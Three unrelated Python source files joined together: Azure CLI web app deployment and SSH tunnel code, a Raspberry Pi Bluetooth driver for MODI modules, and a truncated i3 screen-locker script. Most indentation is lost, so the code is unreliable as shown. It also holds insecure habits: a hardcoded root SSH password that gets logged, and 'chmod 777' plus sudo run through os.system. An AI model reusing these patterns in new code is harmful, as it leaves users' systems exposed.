if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create a new app; check whether to use the default RG or the user-entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we always call the ASP create-or-update API so that, in case of re-deployment, any updated SKU or
    # plan settings are applied
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
except Exception as ex:
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception:
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
            # may need to update stack runtime settings. For node it's site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
                    settings.append('%s=%s' % (k, v))
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, kind="app", properties=app_metadata.properties)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
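# Illustrative trace of _build_onedeploy_url with hypothetical values: for
# scm_url 'https://myapp.scm.azurewebsites.net', artifact_type='war',
# is_async_deployment=True, target_path='webapps/ROOT' and the remaining flags
# left as None, the resulting URL would be roughly:
#   https://myapp.scm.azurewebsites.net/api/publish?type=war&async=True&path=webapps/ROOT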
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e:
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202:
response_body = None
if poll_async_deployment_for_debugging:
            logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
if response.status_code == 200:
return response
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. You can track the ongoing deployment at {}"
.format(deployment_status_url))
    # check if an error occurred during deployment
    if response.status_code:
        raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
                       .format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
open_page_in_browser(scm_url + '/webssh/host')
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku.upper() in ['I1', 'I2', 'I3', 'I1V2', 'I2V2', 'I3V2']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
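    # Remap KeyInfo's serialized fields so 'name' and 'value' are nested under
    # 'properties' in the request payload, as the key APIs appear to expect.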
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name,
name1=key_name,
value=key_value)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
        result = client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot, raw=True)
    else:
        result = client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' of type '{}' from function app '{}'".format(key_name, key_type, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' of type '{}' does not exist in function app '{}'".format(key_name, key_type, name)
return result
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted function '{}' from app '{}'".format(function_name, name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
name1=key_name,
value=key_value)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
name1=key_name,
value=key_value)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
        result = client.web_apps.delete_function_secret_slot(resource_group_name,
                                                             name,
                                                             function_name,
                                                             key_name,
                                                             slot,
                                                             raw=True)
    else:
        result = client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name, raw=True)
if result.response.status_code == HTTPStatus.NO_CONTENT:
return "Successfully deleted key '{}' from function '{}'".format(key_name, function_name)
if result.response.status_code == HTTPStatus.NOT_FOUND:
return "Key '{}' does not exist in function '{}'".format(key_name, function_name)
return result
|
ble_task_rpi.py
|
import time
import os
import json
import queue
import base64
import pexpect
from typing import Optional
from threading import Thread
from modi.task.conn_task import ConnTask
from modi.util.miscellaneous import ask_modi_device
class BleTask(ConnTask):
def __init__(self, verbose=False, uuid=None):
print("Initiating ble_task connection...")
script = os.path.join(os.path.dirname(__file__), 'change_interval.sh')
os.system(f'chmod 777 {script}')
os.system(f'sudo {script}')
super().__init__(verbose=verbose)
self._bus = None
self.__uuid = uuid
self._recv_q = queue.Queue()
self.__close_event = False
@property
def bus(self):
return self._bus
def __find_modi_device(self):
scanner = pexpect.spawn('sudo hcitool lescan')
init_time = time.time()
devices = []
while time.time() - init_time < 1:
info = scanner.readline()
info = info.decode().split()
if 'MODI' in info[1] and info[1] not in (d[1] for d in devices):
devices.append(info)
scanner.terminate()
if not self.__uuid:
self.__uuid = ask_modi_device([d[1].upper() for d in devices])
for info in devices:
if self.__uuid.upper() in info[1].upper():
return info
raise ValueError('MODI network module does not exist!')
def __reset(self):
os.system('sudo hciconfig hci0 down')
os.system('sudo hciconfig hci0 up')
def open_conn(self):
self.__reset()
modi_device = self.__find_modi_device()
print(f'Connecting to {modi_device[1]}...')
self.__reset()
self._bus = pexpect.spawn('gatttool -I')
self._bus.expect('LE')
for _ in range(5):
try:
self._bus.sendline(f'connect {modi_device[0]}')
self._bus.expect('Connection successful', timeout=1)
Thread(daemon=True, target=self.__ble_read).start()
break
except Exception:
print('...')
def close_conn(self):
# Reboot modules to stop receiving channel messages
self.__close_event = True
self.send('{"c":9,"s":0,"d":4095,"b":"Bgg=","l":2}')
time.sleep(0.5)
self._bus.sendline('disconnect')
self._bus.terminate()
os.system("sudo hciconfig hci0 down")
def __ble_read(self):
"""
handle -- integer, characteristic read handle the data was received on
value -- bytearray, the data returned in the notification
"""
while True:
try:
self._bus.expect('value: .*?\r', timeout=0.5)
except Exception:
continue
msg = self._bus.after.decode().lstrip('value: ').split()
json_msg = self.__parse_ble_msg(
bytearray([int(b, 16) for b in msg]))
if self.verbose:
print(f"recv: {json_msg}")
self._recv_q.put(json_msg)
if self.__close_event:
break
time.sleep(0.002)
@ConnTask.wait
def send(self, pkt: str) -> None:
self.send_nowait(pkt)
def send_nowait(self, pkt: str) -> None:
json_msg = json.loads(pkt)
ble_msg = self.__compose_ble_msg(json_msg)
if self.verbose:
print(f"send: {json_msg}")
self._bus.sendline(f'char-write-cmd 0x002a {ble_msg}')
def recv(self) -> Optional[str]:
if self._recv_q.empty():
return None
return self._recv_q.get()
#
# Ble Helper Methods
#
@staticmethod
def __compose_ble_msg(json_msg):
ble_msg = bytearray(16)
ins = json_msg["c"]
sid = json_msg["s"]
did = json_msg["d"]
dlc = json_msg["l"]
data = json_msg["b"]
ble_msg[0] = ins & 0xFF
ble_msg[1] = ins >> 8 & 0xFF
ble_msg[2] = sid & 0xFF
ble_msg[3] = sid >> 8 & 0xFF
ble_msg[4] = did & 0xFF
ble_msg[5] = did >> 8 & 0xFF
ble_msg[6] = dlc & 0xFF
ble_msg[7] = dlc >> 8 & 0xFF
ble_msg[8:8 + dlc] = bytearray(base64.b64decode(data))
data = ""
for b in ble_msg:
data += f'{b:02X}'
return data
@staticmethod
def __parse_ble_msg(ble_msg):
json_msg = dict()
json_msg["c"] = ble_msg[1] << 8 | ble_msg[0]
json_msg["s"] = ble_msg[3] << 8 | ble_msg[2]
json_msg["d"] = ble_msg[5] << 8 | ble_msg[4]
json_msg["l"] = ble_msg[7] << 8 | ble_msg[6]
json_msg["b"] = base64.b64encode(ble_msg[8:]).decode("utf-8")
return json.dumps(json_msg, separators=(",", ":"))
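# A minimal sketch of the packing performed by __compose_ble_msg above, assuming
# the same message layout: a little-endian '<4H' header (c, s, d, l) followed by
# the base64-decoded payload, zero-padded to 16 bytes and rendered as upper-case
# hex. _sketch_compose_ble_msg is illustrative only and is not used by the class.
def _sketch_compose_ble_msg(json_msg: dict) -> str:
    import struct  # only needed for this sketch
    raw = bytearray(16)
    raw[:8] = struct.pack('<4H', json_msg['c'], json_msg['s'],
                          json_msg['d'], json_msg['l'])
    raw[8:8 + json_msg['l']] = base64.b64decode(json_msg['b'])
    return raw.hex().upper()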
|
matrixlock.py
|
#!/usr/bin/python3
from argparse import ArgumentParser
from http.server import BaseHTTPRequestHandler, HTTPServer
from os.path import dirname, join
from subprocess import run, Popen, DEVNULL
from threading import Thread, Event
from time import time
import json
def main(matrix_delay_secs, terminal, locker):
workspaces = get_workspaces()
visible = [ws for ws in workspaces if ws['visible']]
with SubprocessServer(('', 0), len(visible)) as server:
port = server.server_address[1]
for ws in visible:
overlay_matrix_on_workspace(ws['name'], port, matrix_delay_secs, terminal, len(visible))
if locker == 'xtrlock':
run(['xtrlock'], check=True)
else:
run(['i3lock', '-n'], check=True)
for pid_path in server.received_posts:
assert pid_path.startswith('/'), pid_path
try:
pid = int(pid_path[1:])
except ValueError:
continue
run(['kill', str(pid)])
def get_workspaces():
cp = run(
['i3-msg', '-t', 'get_workspaces'],
capture_output=True, check=True, text=True
)
return json.loads(cp.stdout)
def overlay_matrix_on_workspace(ws_name, port, delay, terminal, visible_wss):
# Send child PID to server so the parent can kill it, then show Matrix:
pid_server_command = f'bash -c \'curl -X POST localhost:{port}/$$ && sleep {delay} && cmatrix -b\''
# terminal command
terminal_command = f'exec "xfce4-terminal --hide-scrollbar --hide-menubar --fullscreen --color-text=black -x {pid_server_command}"'
if terminal == 'urxvt':
        # in order for this to be fullscreen, add the following line to your .i3/config file:
        # for_window [instance="^matrixlock$"] fullscreen
terminal_command = f'exec "urxvt -bg Black -name matrixlock -e {pid_server_command}"'
    # workspace command (if only one workspace is visible we don't need to switch)
workspace_command = ''
if visible_wss > 1:
workspace_command = f'workspace {ws_name}; '
run([
'i3-msg',
f'{workspace_command} '
# There may already be a full-screen app on that workspace.
# This would prevent us from showing the Matrix full-screen.
# So disable fullscreen first.
f'fullscreen disable; '
# --color-text=black to hide the cursor when there is a delay.
f'{terminal_command} '
], check=True, stdout=DEVNULL)
class SubprocessServer(HTTPServer):
"""
Process up to num_requests POST requests in up to timeout_secs seconds and
store their paths in self.received_posts.
"""
def __init__(self, server_address, num_requests, timeout_secs=5):
super().__init__(server_address, SubprocessHandler)
self.received_posts = []
self._num_requests = num_requests
self._timeout_secs = timeout_secs
self._thread = Thread(target=self._run_in_thread)
self._started = Event()
self._timeout_encountered = False
def __enter__(self):
result = super().__enter__()
self._thread.start()
self._started.wait()
return result
def __exit__(self, *args, **kwargs):
self._thread.join()
def _run_in_thread(self):
self._started.set()
end = time() + self._timeout_secs
for _ in range(self._num_requests):
time_remaining = end - time()
if time_remaining < 0:
break
self.timeout = time_remaining
